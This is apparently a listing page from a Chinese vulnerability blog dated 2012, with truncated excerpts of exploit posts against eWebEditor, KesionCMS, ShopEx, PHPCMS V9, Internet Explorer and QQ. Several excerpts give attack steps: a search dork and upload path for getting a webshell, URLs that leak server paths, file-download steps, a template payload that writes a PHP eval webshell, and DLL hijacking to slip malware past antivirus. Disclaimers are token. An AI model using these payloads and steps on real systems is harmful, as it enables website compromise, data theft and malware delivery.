Vulndb

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,Exploit、Shellcode、PoC

eWebEditor v1.x (WYSIWYG) Remote File Upload

发布日期:2010-05.23 发布作者:Ma3sTr0-Dz 影响版本:eWebEditor v1.x 漏洞描述: eWebEditor v1.x 文件上传漏洞,通过IIS解析漏洞拿webshell. Dork : allinurl:ewebeditor/asp/ Exploit : /[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn /uplo...

2012-10-28 Vulndb
科讯kesionCMS下载漏洞Exp

科讯kesionCMS下载漏洞Exp

科讯 kesionCMS >=8.0 9.0 任意下载漏洞最新 Exp 关于此漏洞已经在论坛发了2次了。。每次都exp都没搞完全。今天下午抽空就把exp搞完全了。绝对没BUG了。。亲测N个站点 没问题。 漏洞利用条件: 1.kesionCMS 版本 大于等于8.0 2.存在用户管理平台 测试图: 这次主要更新几点: 1.对8.x 9.x 都做了自行判断 2.发布投稿后会程序自动删除发布的...

2012-10-13 Vulndb

科讯kesioncms7.0 任意文件下载漏洞

科讯kesioncms7漏洞,属高危漏洞 漏洞检测方法: 先注册用户登陆,访问/user/Contributor.asp可以看到几个可以投稿的分类,选择个软件投稿.点下一步! 然后跳到:/user/User_MySoftWare.asp?action=Add&channelid=3&ClassID=20102479005271(这个ClassID可能会不一样...

2012-10-06 Vulndb
shopex前台普通用户getshell最新漏洞

shopex前台普通用户getshell最新漏洞

shopex漏洞利用方法: 第一:想办法找到目标网站的绝对路径 http://www.site.com/install/svinfo.php?phpinfo=true http://www.site.com/core/api/shop_api.php http://www.site.com/core/api/site/2.0/api_b2b_2_0_cat.php http://www.site.com/core/api/site/2.0/api_b2b_2_0_goodstype.php http://www.site.com/core/api/site/2.0/api_b2b...

2012-09-30 Vulndb

PHPCMS V9 最新getshell漏洞

+---------------------------------------------------------------------------+ PHPCms V9 GETSHELL 0DAY c0de by testr00ttest hackqing.com 针对iis6.0的漏洞 有点鸡肋 但是也可以用 apache 是老版本可能会产生问题 +-----------------------------------------...

2012-09-30 Vulndb
IE7/8/9 零日漏洞(附Exploit)

IE7/8/9 零日漏洞(附Exploit)

Metasploit制造商HD Moore建议用户停用IE7、IE8和IE9,直到微软修复关键漏洞。 安全专家称,攻击者正在利用微软IE浏览器中的一个“零日”漏洞来攻击访问恶意或被感染的网站的Windows电脑。 微软称正在调查该漏洞的报告,但还没有确定修复该漏洞的时间表。 安全公司Rapid 7表示,IE7、IE8和IE9中未修复的漏洞可以在Windows XP、Vista和Windows ...

2012-09-20 Vulndb

phpcmsV9后台拿shell

search目录下面的index.html右侧的编辑 修改其模版为: PHP <?php $shell = '<?php @eval($_POST[cmd]);?>' ; file_put_contents ( 'shell.php' , $shell );?> 1234567891011...

2012-08-22 Vulndb

Python版phpcmsV9自动写shell

注意:本程序具有攻击性,请勿用作非法用途,否则于本作者无关! 最近一直在学习python相关内容就顺手写个工具以作练习,上代码: PHP #coding: GBK ''' Created on 2012-8-2 @author: Return ''' import cookielib import u...

2012-08-22 Vulndb

phpcmsV9任意读文件漏洞利用工具

注意:本程序带有攻击性,仅供学习研究请勿当作非法工具使用,否则后果自负,于本人无关! 睡觉前去论坛上面看了下,爆出 phpcmsV9最新任意读文件漏洞 ,第一反映就是 完了,估计互联网上又不知道多少万用户数据被脱了~~ 自己就写了一个此漏洞的检测工具方便站长们...

2012-08-22 Vulndb

QQ2012DLL劫持漏洞(可以利用过360提示)

现如今国内半数以前的人都使用者360安全卫士和360杀软, 经常有人会问到有什么好方法可以让自己的“恶意软件”在装有360的机器上启动, 其实DLL Hajack就是很好的方法,此方法不涉及到写注册表等操作, 只要你找到一款软件可利用的Dll Hajack漏洞,将自己的Dll释放到软...

2012-07-26 Vulndb